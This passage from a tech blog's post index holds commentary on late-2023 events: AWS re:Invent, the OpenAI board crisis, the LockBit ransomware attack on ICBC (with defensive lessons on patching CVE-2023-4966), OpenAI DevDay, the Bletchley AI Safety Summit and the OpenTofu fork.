migration.\nAmazon Q Business connects to enterprise data sources — S3 buckets, SharePoint, Salesforce, Jira, and about 40 other connectors — and lets employees ask questions about company information in natural language. It includes IAM-aware access controls, meaning answers respect existing permissions.\nThe differentiation from Microsoft Copilot and Google Duet AI is the deep integration with AWS infrastructure. If you\u0026rsquo;re an AWS shop, being able to ask \u0026ldquo;Why is my Lambda function timing out?\u0026rdquo; and get an answer that considers your CloudWatch logs, X-Ray traces, and configuration is genuinely useful. Whether it works as well in practice as in the demo remains to be seen, but the architectural approach is sound.\nGraviton4 and Custom Silicon # AWS continues its custom chip strategy with Graviton4, the fourth generation of their Arm-based processors. The numbers are impressive: 30% better compute performance versus Graviton3, 50% more cores, and 75% more memory bandwidth. The R8g instances powered by Graviton4 are designed for memory-intensive workloads — databases, caching, real-time analytics.\nFor teams that haven\u0026rsquo;t yet migrated to Graviton, the performance-per-dollar advantage keeps widening. I\u0026rsquo;ve been running production workloads on Graviton3 for over a year, and the cost savings are real — typically 20-30% versus comparable x86 instances, with equivalent or better performance for most workloads. Graviton4 will extend that advantage.\nOn the AI silicon front, AWS announced Trainium2, their custom chip for training large AI models. They\u0026rsquo;re clustering these into EC2 UltraClusters of up to 100,000 chips connected via high-bandwidth networking. This is AWS\u0026rsquo;s answer to NVIDIA\u0026rsquo;s dominance in AI training — offering an alternative for organizations that can\u0026rsquo;t get enough H100 GPU allocation or want to reduce their dependency on a single silicon vendor.\nZero-ETL and Data Integration # A less flashy but practically significant theme at re:Invent is the expansion of zero-ETL integrations. AWS announced zero-ETL support from additional sources into Amazon Redshift, including Amazon DynamoDB, and new integrations between Aurora and other analytics services.\nFor anyone who\u0026rsquo;s built and maintained ETL pipelines, the appeal is obvious. Data integration is one of those unglamorous but critical parts of infrastructure that consumes enormous engineering time. Every pipeline you don\u0026rsquo;t have to build, monitor, and debug is engineering capacity freed for actual product work.\nThe new Amazon Aurora Limitless Database is also worth noting — it provides automatic horizontal scaling for Aurora PostgreSQL, handling sharding transparently. If you\u0026rsquo;ve ever had to manually shard a PostgreSQL database, you know how painful that process is. Having it handled at the database engine level is the kind of infrastructure improvement that won\u0026rsquo;t make headlines but will save teams significant operational burden.\nS3 Express One Zone and Storage Innovations # S3 Express One Zone is a new storage class designed for latency-sensitive workloads, delivering single-digit millisecond data access — up to 10x faster than standard S3. It uses a different architecture than traditional S3, with data stored in a single Availability Zone on high-performance storage.\nThis matters for AI/ML workloads where training jobs need to read large datasets quickly, and for analytics workflows where S3 access latency is a bottleneck. The trade-off is reduced durability compared to standard S3 (single AZ vs. multi-AZ), which is acceptable for derived data and intermediate processing results but not for primary data storage.\nThe Broader Pattern # Step back from individual announcements and the strategic pattern is clear. AWS is pursuing a three-layer AI strategy:\nInfrastructure layer: Custom silicon (Graviton, Trainium, Inferentia) and optimized storage/networking for AI workloads Model layer: Amazon Bedrock as a managed service for accessing multiple foundation models (Claude, Llama 2, Titan, Stable Diffusion) without managing infrastructure Application layer: Amazon Q as the AI-powered interface that sits on top and makes everything accessible This is a fundamentally different approach than OpenAI\u0026rsquo;s (build the best model and provide API access) or Google\u0026rsquo;s (leverage search and data advantages). AWS is betting that AI value will primarily be captured at the infrastructure and integration layer — that most enterprises will care more about connecting AI to their existing data and workflows than about which specific model is 2% better on benchmarks.\nMy Take # re:Invent 2023 feels like a transition year. The generative AI hype of 2023 is starting to concretize into actual infrastructure and tooling. Amazon Q might not be as capable as GPT-4 for general conversation, but it doesn\u0026rsquo;t need to be — it needs to be good enough to answer questions about your AWS bill, your CloudWatch alarms, and your deployment pipeline.\nThe Graviton4 and Trainium2 announcements reinforce something I\u0026rsquo;ve believed for a while: the companies that control the silicon will have significant long-term advantages in AI. AWS, Google, and increasingly Microsoft (via custom chips) are all investing in custom processors because they know that AI workload economics are fundamentally determined by compute efficiency.\nFor infrastructure teams, the practical takeaway is this: if you\u0026rsquo;re on AWS, evaluate Amazon Q Developer when it\u0026rsquo;s generally available, plan your Graviton4 migration for memory-intensive workloads, and look at the zero-ETL integrations to simplify your data pipelines. These aren\u0026rsquo;t revolutionary changes — they\u0026rsquo;re the kind of incremental infrastructure improvements that compound into significant operational advantages over time.\nThe AI revolution will be built on infrastructure. And re:Invent 2023 is AWS reminding everyone that infrastructure is their game.\n","date":"30 November 2023","externalUrl":null,"permalink":"/posts/231130-aws-reinvent-2023-amazon-q/","section":"Tech Blog: AI, Security, Infrastructure \u0026 Open Source","summary":"AWS re:Invent 2023 introduces Amazon Q, Graviton4, and a wave of AI-integrated cloud services that signal where enterprise infrastructure is heading.","title":"AWS re:Invent 2023 — Amazon Q and the AI-Infused Cloud","type":"posts"},{"content":"What a week. If you\u0026rsquo;re just emerging from a Thanksgiving food coma, here\u0026rsquo;s the compressed version: last Friday, OpenAI\u0026rsquo;s board fired CEO Sam Altman. Then president Greg Brockman resigned. Then nearly all of OpenAI\u0026rsquo;s 700+ employees threatened to leave and join Microsoft. Then, on Wednesday — yesterday — Altman was reinstated as CEO with a new board. The whole saga played out over five days that felt like five months.\nI\u0026rsquo;ve witnessed plenty of corporate drama over three decades in tech, but I\u0026rsquo;ve never seen anything quite like this. The speed, the stakes, and the sheer chaos were unprecedented. And for those of us who build on OpenAI\u0026rsquo;s platform, this wasn\u0026rsquo;t just corporate theater — it was a stress test of our architectural decisions. The period from GPT-3\u0026rsquo;s launch through ChatGPT\u0026rsquo;s explosive growth to GPT-4\u0026rsquo;s capabilities created unprecedented expectations and dependencies.\nWhat Actually Happened # On Friday, November 17th, OpenAI\u0026rsquo;s board of directors — a six-person nonprofit board — announced that Sam Altman was being removed as CEO because he was \u0026ldquo;not consistently candid in his communications with the board.\u0026rdquo; No further explanation was given. The abruptness was staggering: Altman reportedly learned he was being fired via a Google Meet call minutes before the public announcement.\nGreg Brockman, OpenAI\u0026rsquo;s president and co-founder, was removed from the board and subsequently resigned. Mira Murati was named interim CEO, then replaced within days by Emmett Shear (former Twitch CEO), who himself lasted only until Altman\u0026rsquo;s reinstatement.\nThe most remarkable development was the employee revolt. Over 700 of OpenAI\u0026rsquo;s approximately 770 employees signed a letter threatening to leave and join Microsoft — which had offered to hire the entire staff — unless the board resigned and reinstated Altman. Microsoft CEO Satya Nadella publicly confirmed the offer, essentially providing a safety net that made the employees\u0026rsquo; ultimatum credible.\nBy Wednesday, the crisis resolved: Altman returned as CEO, and a new initial board was announced including Bret Taylor (former Salesforce co-CEO), Larry Summers (former US Treasury Secretary), and Adam D\u0026rsquo;Angelo (Quora CEO, the only holdover).\nThe Governance Problem # Beneath the drama lies a genuinely difficult question: how should organizations developing frontier AI be governed?\nOpenAI\u0026rsquo;s unusual structure — a nonprofit board overseeing a capped-profit subsidiary — was explicitly designed to prioritize safety over commercial interests. The board\u0026rsquo;s charter states that its \u0026ldquo;primary fiduciary duty is to humanity.\u0026rdquo; This structure was supposed to be a feature, not a bug: a safeguard ensuring that the pursuit of artificial general intelligence wouldn\u0026rsquo;t be driven purely by profit motives. The broader question of who governs transformative AI platforms had already become central to the industry.\nIn practice, the structure created a governance body with enormous power and limited accountability. A six-person board, several of whom had limited operational experience with the company, could fire the CEO of one of the most valuable and consequential technology companies on earth without consulting employees, investors, or partners. And they did.\nWhether the board had legitimate concerns about Altman\u0026rsquo;s leadership is still unclear. But the execution — firing the CEO with no succession plan, no communication strategy, and no apparent consideration of the operational consequences — was a governance failure regardless of the underlying merits.\nWhat This Means for Developers # For the thousands of companies building on OpenAI\u0026rsquo;s APIs, this week was deeply unsettling. Consider the scenario that nearly materialized: OpenAI\u0026rsquo;s entire workforce departing for Microsoft, leaving the company that provides your core AI infrastructure as an empty shell. If you\u0026rsquo;d built your product around the OpenAI API with no fallback plan, you were days away from a potential catastrophe.\nThis should crystallize several architectural principles:\nAbstraction layers aren\u0026rsquo;t optional. If your codebase makes direct OpenAI API calls throughout the application, you have a single point of failure. Wrap your LLM interactions behind an abstraction that can swap providers — whether that\u0026rsquo;s a custom interface, something like LiteLLM, or a framework-level abstraction. The cost of this indirection is minimal; the risk mitigation is substantial.\nMulti-model strategies are prudent. Anthropic\u0026rsquo;s Claude, Google\u0026rsquo;s Gemini (coming soon), Meta\u0026rsquo;s Llama 2, and Mistral\u0026rsquo;s models are all viable alternatives for many use cases. You don\u0026rsquo;t need to run everything through multiple providers today, but you should have tested alternatives and know your migration path.\nEvaluate self-hosted options for critical workloads. Open-source models have improved dramatically. For latency-sensitive or mission-critical applications, running a fine-tuned open model on your own infrastructure eliminates the platform dependency entirely. The performance gap with GPT-4 is real but narrowing.\nThe Microsoft Factor # Microsoft\u0026rsquo;s strategic positioning in AI has always been central to its future, and this crisis revealed the depth of Microsoft\u0026rsquo;s dependence on OpenAI while also demonstrating Microsoft\u0026rsquo;s broader ecosystem power.\nBut the episode also revealed the strange dynamics of the Microsoft-OpenAI relationship. Microsoft has invested $13 billion in OpenAI and resells its models through Azure, yet had no board seat and no advance warning that the CEO of its most important AI partner was about to be fired. The new board structure will presumably address this, but the power imbalance between OpenAI\u0026rsquo;s commercial reality and its nonprofit governance was laid bare.\nFor the broader AI ecosystem, the likely outcome is that OpenAI becomes more conventionally corporate. The nonprofit board\u0026rsquo;s power will be curtailed, commercial interests will carry more weight, and the \u0026ldquo;safety-first\u0026rdquo; governance experiment will be significantly diluted. Whether that\u0026rsquo;s good or bad depends on your perspective on AI risk.\nMy Take # The past week demonstrated that the AI industry\u0026rsquo;s most important company was held together by the loyalty of its employees and the financial backing of Microsoft — not by its governance structure. That\u0026rsquo;s a fragile foundation for an organization that many believe is building one of the most transformative (and potentially dangerous) technologies in history.\nFor developers, the lesson is practical: don\u0026rsquo;t bet your product on any single AI provider. This week it was a governance crisis. Next time it could be a pricing change, an API deprecation, a policy shift, or a regulatory action. The history of platform consolidation shows how quickly dependencies become liabilities. The specific risk doesn\u0026rsquo;t matter — what matters is that your architecture can absorb the shock.\nI\u0026rsquo;m glad Altman is back and OpenAI appears stabilized, but I\u0026rsquo;ll be spending this holiday weekend reviewing our own dependencies and making sure we have credible alternatives tested and ready. I\u0026rsquo;d encourage you to do the same.\n","date":"23 November 2023","externalUrl":null,"permalink":"/posts/231123-openai-board-crisis-lessons/","section":"Tech Blog: AI, Security, Infrastructure \u0026 Open Source","summary":"The chaotic week at OpenAI — from Sam Altman’s firing to his return — reveals deep tensions in AI governance and raises questions every developer should consider.","title":"The OpenAI Board Crisis — Governance, Trust, and the Future of AI Development","type":"posts"},{"content":"Last week, the Industrial and Commercial Bank of China (ICBC) — the world\u0026rsquo;s largest bank by total assets — confirmed that its US financial services division was hit by a ransomware attack. The attack, attributed to the LockBit ransomware group, disrupted the bank\u0026rsquo;s ability to settle US Treasury trades, forcing ICBC to route transactions through USB sticks delivered by courier to BNY Mellon. Let that sink in: the largest bank on the planet was reduced to sneakernetting data because its systems were locked by criminals.\nIf there was ever an incident that should force the financial sector to take ransomware preparedness seriously at the board level, this is it.\nWhat Happened # The attack targeted ICBC Financial Services (ICBC FS), the bank\u0026rsquo;s US-based broker-dealer subsidiary. On November 9th, LockBit ransomware encrypted systems critical to clearing and settling Treasury market transactions. ICBC FS is a significant player in the US Treasury market, and the disruption was serious enough to temporarily affect Treasury market liquidity.\nAccording to reports from Bloomberg and other financial press, the bank disconnected affected systems and began manual processing of trades. The Financial Times reported that ICBC FS temporarily owed BNY Mellon $9 billion as trades failed to settle through normal channels. The bank reportedly paid the ransom, though ICBC hasn\u0026rsquo;t confirmed this publicly.\nLockBit, the ransomware-as-a-service group responsible, has been the most prolific ransomware operation globally throughout 2023. They\u0026rsquo;ve hit hospitals, schools, government agencies, and now one of the world\u0026rsquo;s most systemically important financial institutions.\nThe Unpatched Citrix Bleed Vulnerability # What makes this attack particularly frustrating from a security practitioner\u0026rsquo;s perspective is the apparent attack vector. Multiple security researchers have pointed to CVE-2023-4966, known as \u0026ldquo;Citrix Bleed,\u0026rdquo; as the likely entry point. This vulnerability in Citrix NetScaler ADC and Gateway devices allows attackers to bypass authentication and hijack existing sessions.\nHere\u0026rsquo;s the timeline that should make every CISO uncomfortable:\nOctober 10: Citrix releases a patch for CVE-2023-4966 October 18: CISA adds it to its Known Exploited Vulnerabilities catalog October 23-24: Mandiant and other researchers report active exploitation in the wild November 9: ICBC gets hit, reportedly through an unpatched Citrix device A month. There was a full month between the patch being available and the attack. This isn\u0026rsquo;t a zero-day story — it\u0026rsquo;s a patch management story. And it\u0026rsquo;s depressingly common. The pattern repeats endlessly: critical vulnerability disclosed, patch released, organizations fail to apply it in time, attackers exploit the gap.\nSystemic Risk in Financial Infrastructure # The ICBC attack raises uncomfortable questions about systemic risk in financial market infrastructure. US Treasury markets are the backbone of the global financial system — they\u0026rsquo;re where governments, central banks, and institutions park trillions of dollars. A sustained disruption to Treasury clearing could cascade through the entire financial system.\nThe fact that a single compromised entity could disrupt Treasury settlement highlights the concentration risk in market infrastructure. ICBC FS handles a meaningful volume of Treasury repo clearing, and when its systems went down, there was no seamless failover. The manual workarounds — including literally sending data on physical media — demonstrate that business continuity planning at this institution did not adequately account for a full ransomware scenario.\nFor those of us who build and secure systems, this is a sobering reminder. I\u0026rsquo;ve been involved in disaster recovery planning exercises where ransomware scenarios were dismissed as \u0026ldquo;unlikely\u0026rdquo; for critical infrastructure. The ICBC attack should end that complacency permanently.\nLessons for Every Organization # You don\u0026rsquo;t need to be a bank to learn from this incident. Several takeaways apply broadly:\nPatch management remains the highest-leverage security activity. It\u0026rsquo;s not glamorous, it doesn\u0026rsquo;t involve AI or blockchain or whatever the security vendor du jour is selling, but keeping your systems patched against known exploited vulnerabilities is the single most effective thing you can do. If your organization can\u0026rsquo;t patch a critical CISA KEV entry within two weeks, you have a process problem that no technology purchase will fix.\nNetwork segmentation limits blast radius. Early indications suggest that the ransomware was contained to ICBC FS\u0026rsquo;s US operations and didn\u0026rsquo;t spread to the parent bank\u0026rsquo;s broader infrastructure. Whether this was by design or by luck, it demonstrates the value of network segmentation — especially for subsidiaries and divisions that operate in different regulatory environments.\nRansomware response plans must include manual operations. Every organization should have documented procedures for operating critical business processes without their primary systems. Test them regularly. If your disaster recovery plan has never been executed, it\u0026rsquo;s not a plan — it\u0026rsquo;s a wish.\nSupply chain and third-party risk is real. The ripple effects of the ICBC attack extended to every counterparty that relied on ICBC FS for settlement. If your business depends on third-party infrastructure, you need to understand their security posture and have contingency plans for their failure.\nMy Take # The ICBC attack is one of those incidents that feels like it should be a turning point but probably won\u0026rsquo;t be. We\u0026rsquo;ve had turning points before — SolarWinds, Colonial Pipeline, the Equifax breach — and each time the industry collectively vows to do better before settling back into the same patterns.\nWhat frustrates me most is the preventability. This wasn\u0026rsquo;t a sophisticated nation-state operation exploiting unknown vulnerabilities. It was a known ransomware group exploiting a vulnerability that had been patched for a month. The tools to prevent this exist. The patches were available. The warnings were issued. And one of the largest financial institutions in the world still got caught.\nIf your organization\u0026rsquo;s patch management process takes more than two weeks for critical vulnerabilities, consider this your wake-up call. The next ICBC could be anyone.\n","date":"16 November 2023","externalUrl":null,"permalink":"/posts/231116-icbc-lockbit-ransomware-attack/","section":"Tech Blog: AI, Security, Infrastructure \u0026 Open Source","summary":"The LockBit ransomware attack on ICBC’s US operations disrupted Treasury market trading and exposed critical vulnerabilities in financial infrastructure.","title":"ICBC Ransomware Attack — When the World's Largest Bank Gets Hit","type":"posts"},{"content":"On Monday, OpenAI held its first-ever developer conference — DevDay — in San Francisco, and it was a masterclass in platform strategy. Sam Altman took the stage and rattled off announcements at a pace that left the developer community scrambling to process the implications. Having watched many \u0026ldquo;developer day\u0026rdquo; events over the years, from Apple\u0026rsquo;s WWDC to Microsoft Build, I can say this one packed more consequential announcements per minute than most. Just eight months earlier, GPT-4 had just been released, and already the platform had evolved dramatically.\nThe highlights: GPT-4 Turbo with a 128K context window, a new Assistants API, custom GPTs that anyone can build without code, a GPT Store coming later, significantly reduced pricing, and JSON mode for reliable structured output. Each of these deserves unpacking.\nGPT-4 Turbo: The Numbers That Matter # Building on the foundation of GPT-4, GPT-4 Turbo isn\u0026rsquo;t just a speed bump. The 128K context window — roughly 300 pages of text — fundamentally changes what\u0026rsquo;s architecturally possible. Many of the elaborate RAG (Retrieval Augmented Generation) pipelines that teams have been building over the past year suddenly face a simpler competitor: just stuff more context into the prompt.\nThat\u0026rsquo;s an oversimplification, of course. RAG still has advantages for freshness, cost control, and precision retrieval over truly massive corpora. But for a significant category of use cases — analyzing a codebase, processing a long legal document, summarizing a quarter\u0026rsquo;s worth of customer feedback — the 128K window means you can skip the chunking, embedding, and retrieval infrastructure entirely.\nThe pricing is equally significant: GPT-4 Turbo input tokens cost $0.01 per 1K and output tokens $0.03 per 1K — roughly 3x cheaper than GPT-4. For teams that shelved GPT-4 integration because the unit economics didn\u0026rsquo;t work, it\u0026rsquo;s time to revisit those spreadsheets.\nThe knowledge cutoff has also been updated to April 2023, which eliminates one of the most common complaints developers had when building customer-facing applications. No more awkward \u0026ldquo;I don\u0026rsquo;t know about that, my training data only goes to September 2021\u0026rdquo; moments.\nThe Assistants API: OpenAI\u0026rsquo;s Real Play # While GPT-4 Turbo grabbed the headlines, the Assistants API is arguably the more strategically important announcement. It provides built-in support for persistent threads, code interpreter, knowledge retrieval, and function calling — essentially, OpenAI is productizing the agent framework that hundreds of startups and open-source projects have been building independently.\nIf you\u0026rsquo;ve been using LangChain, LlamaIndex, or AutoGen to orchestrate multi-step AI workflows, you should be paying close attention. The Assistants API handles conversation state management, file uploads for retrieval, and tool execution natively. It\u0026rsquo;s not as flexible as a custom orchestration layer, but it covers the 80% case with dramatically less code.\nThis is a classic platform play. OpenAI is moving up the stack from \u0026ldquo;model provider\u0026rdquo; to \u0026ldquo;application platform,\u0026rdquo; absorbing functionality that was previously the domain of middleware libraries and startups. I\u0026rsquo;ve seen this pattern before — AWS did it with managed services that replaced open-source tools, and it\u0026rsquo;s always a double-edged sword for the ecosystem.\nCustom GPTs and the GPT Store # The custom GPTs feature lets anyone create a specialized ChatGPT variant by providing instructions, knowledge files, and selecting capabilities — no coding required. OpenAI announced a GPT Store launching later this month where creators can publish and monetize their GPTs.\nThis is interesting from a product perspective, but I\u0026rsquo;m skeptical about the long-term value proposition. The barrier to creating a custom GPT is so low that differentiation will be nearly impossible. We\u0026rsquo;ve seen this movie before with app stores — the initial gold rush gives way to a crowded marketplace where discovery is the primary challenge. When the GPT Store eventually launched, many of these dynamics played out as predicted.\nFor professional developers, the more relevant angle is the Actions system that lets custom GPTs call external APIs. This effectively turns every GPT into a potential integration point with your existing services. If your product has an API, someone will build a GPT wrapper around it. Whether that\u0026rsquo;s an opportunity or a threat depends on your business model.\nJSON Mode and Reproducible Outputs # A smaller but deeply practical announcement: GPT-4 Turbo now supports a JSON mode that guarantees valid JSON output, and a seed parameter for reproducible outputs. For anyone who\u0026rsquo;s written fragile regex parsing to extract structured data from LLM responses, or built retry loops to handle malformed JSON, this is a genuine quality-of-life improvement.\nThe seed parameter for reproducible outputs is particularly valuable for testing. One of the biggest challenges in building LLM-powered features has been the non-deterministic nature of the outputs — making it nearly impossible to write reliable integration tests. With consistent seeded outputs, we can finally build proper regression test suites.\nMy Take # DevDay crystallized something I\u0026rsquo;ve been sensing for months: OpenAI is no longer just an AI research lab that happens to have an API. It\u0026rsquo;s becoming a developer platform company, and it\u0026rsquo;s doing so with the kind of speed and ambition that should make both competitors and ecosystem partners nervous.\nThe strategic calculus for development teams has shifted. Building custom orchestration and RAG infrastructure still makes sense for complex, differentiated use cases. But for straightforward AI integration — chatbots, document analysis, code assistance — the build-vs-buy equation now strongly favors OpenAI\u0026rsquo;s managed offerings.\nMy concern is vendor lock-in. Every feature that OpenAI absorbs into their platform is another dependency that\u0026rsquo;s difficult to migrate away from. If you\u0026rsquo;re building on the Assistants API and OpenAI changes pricing, policies, or capabilities, your options are limited. I\u0026rsquo;d recommend maintaining abstraction layers and keeping an eye on open-source alternatives like Mistral and Llama 2 that are closing the capability gap.\nDevDay was impressive. It was also a reminder that in the AI platform war, the pace of change is unlike anything I\u0026rsquo;ve seen in three decades of software development. The accessibility of the ChatGPT API had democratized AI integration, and now OpenAI was systematically building managed services to capture more of the AI application stack.\n","date":"9 November 2023","externalUrl":null,"permalink":"/posts/231109-openai-devday-gpt4-turbo/","section":"Tech Blog: AI, Security, Infrastructure \u0026 Open Source","summary":"OpenAI’s DevDay unveils GPT-4 Turbo, custom GPTs, and the Assistants API — signaling a major shift from model provider to developer platform.","title":"OpenAI DevDay — GPT-4 Turbo and the Platform Play","type":"posts"},{"content":"Yesterday and today, representatives from 28 countries gathered at Bletchley Park — the historic home of World War II codebreaking — to discuss something that would have seemed like science fiction to Alan Turing and his colleagues: how to govern artificial intelligence that\u0026rsquo;s rapidly approaching capabilities we barely understand. The symbolism of the venue isn\u0026rsquo;t lost on anyone in the tech community.\nThe UK AI Safety Summit is the first major international gathering specifically focused on the risks posed by frontier AI systems. And regardless of where you stand on AI doomerism versus techno-optimism, the fact that this conversation is happening at a governmental level matters enormously for those of us building software.\nThe Bletchley Declaration # The headline outcome is the Bletchley Declaration, signed by all 28 participating nations including the US, China, and the EU member states. It acknowledges that advanced AI systems pose potentially catastrophic risks and commits signatories to international cooperation on AI safety. China\u0026rsquo;s presence at the table is particularly noteworthy — getting Beijing and Washington to agree on anything technology-related these days is an achievement in itself.\nThe declaration identifies several risk categories: misuse of AI for cyberattacks and bioweapons, loss of control over autonomous systems, and societal-scale disruption. For developers, the important takeaway is that this isn\u0026rsquo;t just about hypothetical superintelligence scenarios. The declaration explicitly mentions current-generation risks — things like AI-generated disinformation, automated vulnerability discovery, and the amplification of existing biases at scale.\nWhat This Means for AI Development Teams # If you\u0026rsquo;re leading a team that\u0026rsquo;s integrating LLMs or other AI capabilities into production systems, this summit should be on your radar for several practical reasons.\nFirst, regulation is coming, and it\u0026rsquo;s going to be international. The EU AI Act is already well advanced, the Biden administration issued its Executive Order on AI just days ago, and now we have a multilateral framework forming. The direction of travel is clear: if you\u0026rsquo;re deploying AI systems, you\u0026rsquo;ll need to demonstrate safety testing, maintain audit trails, and potentially submit to external evaluation — especially for high-risk applications.\nSecond, the summit established the UK AI Safety Institute, a government body dedicated to evaluating frontier AI models before and after deployment. This is a template that other nations will likely replicate. The practical implication? Model providers will face increasing pressure to allow third-party safety testing, which could affect API availability, model access, and the speed at which new capabilities reach developers.\nThird, and perhaps most importantly for day-to-day development work, the emphasis on responsible AI development practices is going to filter down into enterprise procurement requirements. I\u0026rsquo;ve already seen RFP documents asking about AI governance frameworks. This trend will accelerate.\nThe Technical Community\u0026rsquo;s Mixed Reaction # The reaction from the AI research and development community has been predictably divided. On one side, researchers at organizations like the Centre for AI Safety see this as long overdue recognition that the risks are real and require coordinated action. On the other, many practitioners worry that premature regulation could stifle innovation and hand advantages to less scrupulous actors.\nI think both perspectives have merit. Having spent decades watching technology regulation cycles, I can say that governments almost never get the technical details right on the first pass. The EU\u0026rsquo;s cookie consent disaster is a prime example — well-intentioned regulation that created a worse user experience without meaningfully improving privacy. The risk of similar outcomes with AI regulation is real.\nBut the alternative — no governance framework at all — isn\u0026rsquo;t viable either. The capabilities emerging from frontier labs are genuinely unprecedented, and the \u0026ldquo;move fast and break things\u0026rdquo; philosophy becomes considerably less appealing when the things being broken could be critical infrastructure or democratic processes.\nMy Take # What strikes me most about the Bletchley Park summit is the speed at which we\u0026rsquo;ve moved from \u0026ldquo;should we regulate AI?\u0026rdquo; to \u0026ldquo;how do we regulate AI internationally?\u0026rdquo; Twelve months ago, ChatGPT had just launched and most policymakers couldn\u0026rsquo;t articulate what a large language model was. Now we have a multilateral declaration and a new government institution dedicated to AI safety.\nFor those of us in the trenches — building systems, integrating models, shipping features — the practical advice is straightforward: start building governance into your AI development processes now. Document your model choices, maintain evaluation datasets, implement monitoring for model behavior in production, and establish clear escalation paths for when things go wrong. This isn\u0026rsquo;t just good engineering practice; it\u0026rsquo;s preparing for the regulatory landscape that\u0026rsquo;s clearly forming.\nThe summit at Bletchley Park won\u0026rsquo;t change your sprint backlog tomorrow. But the trajectory it represents will reshape how we build and deploy AI systems over the coming years. Better to be ahead of that curve than scrambling to catch up.\n","date":"2 November 2023","externalUrl":null,"permalink":"/posts/231102-bletchley-park-ai-safety-summit/","section":"Tech Blog: AI, Security, Infrastructure \u0026 Open Source","summary":"The UK’s AI Safety Summit at Bletchley Park brings 28 nations together to discuss AI risks, marking a watershed moment for international AI governance.","title":"Bletchley Park AI Safety Summit — Governments Finally Enter the Chat","type":"posts"},{"content":"It\u0026rsquo;s been roughly two months since HashiCorp switched Terraform from the Mozilla Public License (MPL) to the Business Source License (BSL), and the community response has crystallised into something real: OpenTofu. What started as an open letter and a manifesto has become a Linux Foundation project with significant backing, active development, and its first alpha releases. The question is no longer \u0026ldquo;will there be a fork?\u0026rdquo; but \u0026ldquo;how will the fork and the original coexist?\u0026rdquo;\nThe Backstory, Briefly # In August, HashiCorp announced that all future releases of Terraform (and other HashiCorp products) would be under the BSL 1.1 license. The BSL allows most use cases but restricts using the software to create competing products or services. For many users, nothing changed practically. But for companies building managed Terraform services, CI/CD platforms with Terraform integration, or consulting businesses, the implications were significant.\nThe response was swift. Within days, a coalition of companies and individual contributors launched the OpenTF manifesto, calling for Terraform to remain truly open source. When HashiCorp didn\u0026rsquo;t reverse course, the fork was announced. In September, the Linux Foundation formally adopted the project, renaming it OpenTofu to avoid trademark issues.\nWhere OpenTofu Stands Today # OpenTofu has released its first alpha versions, tracking closely with Terraform 1.6. The project\u0026rsquo;s initial goal is straightforward: maintain compatibility with existing Terraform configurations while establishing an independent development path under a genuinely open-source license (MPL 2.0).\nThe OpenTofu repository is active, with contributions from engineers at Spacelift, Env0, Gruntwork, and other infrastructure companies. The steering committee includes representatives from several organisations, which helps prevent any single company from controlling the project\u0026rsquo;s direction.\nFrom a practical standpoint, the current alpha is largely a drop-in replacement. You can point it at existing Terraform state files and configurations. The registry compatibility work is progressing, with OpenTofu setting up its own provider and module registry while maintaining compatibility with the existing ecosystem.\nThe Technical Divergence Question # The most interesting question right now is how quickly OpenTofu will diverge from Terraform. In the short term, maintaining compatibility is essential — nobody wants to rewrite their infrastructure code. But over time, independent governance means independent technical decisions.\nSome areas where divergence might occur:\nState management: Terraform\u0026rsquo;s state handling has always been a pain point. Remote state, state locking, state migration — these are areas where significant improvements are possible. An open-source project with multiple commercial backers might be more willing to make breaking changes in state management if the community consensus supports it.\nProvider ecosystem: Both Terraform and OpenTofu use the same provider protocol, so existing providers work with both. But new providers could theoretically be developed exclusively for one or the other. The OpenTofu registry is being built to remain compatible, but the long-term evolution is uncertain.\nLanguage features: HashiCorp has been conservative with HCL evolution. An independent OpenTofu could potentially move faster on language features — better loops, first-class functions, improved module system — if the community demands it. This mirrors what we\u0026rsquo;ve seen with other open-source relicensing crises.\nPersonally, I think we\u0026rsquo;re looking at a period of compatibility lasting at least a year, possibly longer. The OpenTofu team is smart enough to know that forcing users to choose too early would be counterproductive.\nWhat This Means for Your Infrastructure # If you\u0026rsquo;re using Terraform in production today, don\u0026rsquo;t panic. Nothing requires immediate action. HashiCorp isn\u0026rsquo;t going to stop maintaining Terraform — if anything, the competition will motivate them to ship faster.\nHere\u0026rsquo;s my practical advice:\nKeep your configurations standard. Stick to well-documented HCL patterns and avoid relying on undocumented behaviour. This gives you maximum flexibility to switch between Terraform and OpenTofu if needed.\nWatch the registry situation. Providers and modules are the ecosystem\u0026rsquo;s lifeblood. If your critical providers are well-maintained by their original vendors (AWS, Azure, Google Cloud, etc.), they\u0026rsquo;ll likely support both tools. Niche providers might take longer to explicitly support OpenTofu.\nTest OpenTofu in non-production environments. It\u0026rsquo;s alpha quality right now, but testing it against your configurations helps you understand the compatibility story and provides valuable feedback to the project.\nDon\u0026rsquo;t rewrite anything yet. If your Terraform setup works, keep it working. The time for potentially switching is when OpenTofu reaches a stable 1.0 release and your team has had time to evaluate it properly.\nThe Broader Open Source Lesson # This saga is a case study in open-source sustainability tensions. HashiCorp built an incredible product and gave it away under an open license. Other companies built profitable businesses on top of that product. HashiCorp decided the value exchange was unfair and changed the license. The community decided the license change was unacceptable and forked.\nEveryone involved has a legitimate point. HashiCorp invested hundreds of millions in R\u0026amp;D and watched competitors monetise their work. The community invested time, plugins, modules, and expertise into an ecosystem that was promised to be open source. There\u0026rsquo;s no clean villain here.\nWhat I find encouraging is that the Linux Foundation stepped in quickly and gave OpenTofu institutional backing. Open-source projects need governance, funding, and legal support to survive long-term. A passionate community without institutional support tends to fragment. OpenTofu has both, which gives it a real chance.\nMy Take # I\u0026rsquo;ve managed infrastructure with Terraform since the early 0.x days, and it transformed how I think about infrastructure provisioning. Whatever happens with the fork, Terraform\u0026rsquo;s impact on the industry is undeniable.\nMy bet is that both Terraform and OpenTofu will coexist for the foreseeable future, similar to how MySQL and MariaDB, or Elasticsearch and OpenSearch have settled into parallel existence. The market is big enough for both, and competition drives innovation.\nFor now, I\u0026rsquo;m keeping Terraform in production and running OpenTofu in a test environment. The alpha is promising, and the pace of development suggests a stable release isn\u0026rsquo;t too far off. When it arrives, I\u0026rsquo;ll evaluate the switch more seriously.\nThe infrastructure-as-code ecosystem is healthier with genuine competition, and that\u0026rsquo;s ultimately what we\u0026rsquo;ve gained from this situation, messy as the journey has been.\n","date":"26 October 2023","externalUrl":null,"permalink":"/posts/231026-opentofu-terraform-fork/","section":"Tech Blog: AI, Security, Infrastructure \u0026 Open Source","summary":"OpenTofu, the community fork of Terraform born from HashiCorp’s license change, is rapidly building momentum under the Linux Foundation.","title":"OpenTofu Gains Momentum — The Terraform Fork Finding Its Feet","type":"posts"},{"content":"Node.js 21 was released on October 17th, continuing the project\u0026rsquo;s steady six-month cadence for odd-numbered (current) releases. While odd-numbered releases don\u0026rsquo;t become LTS (that 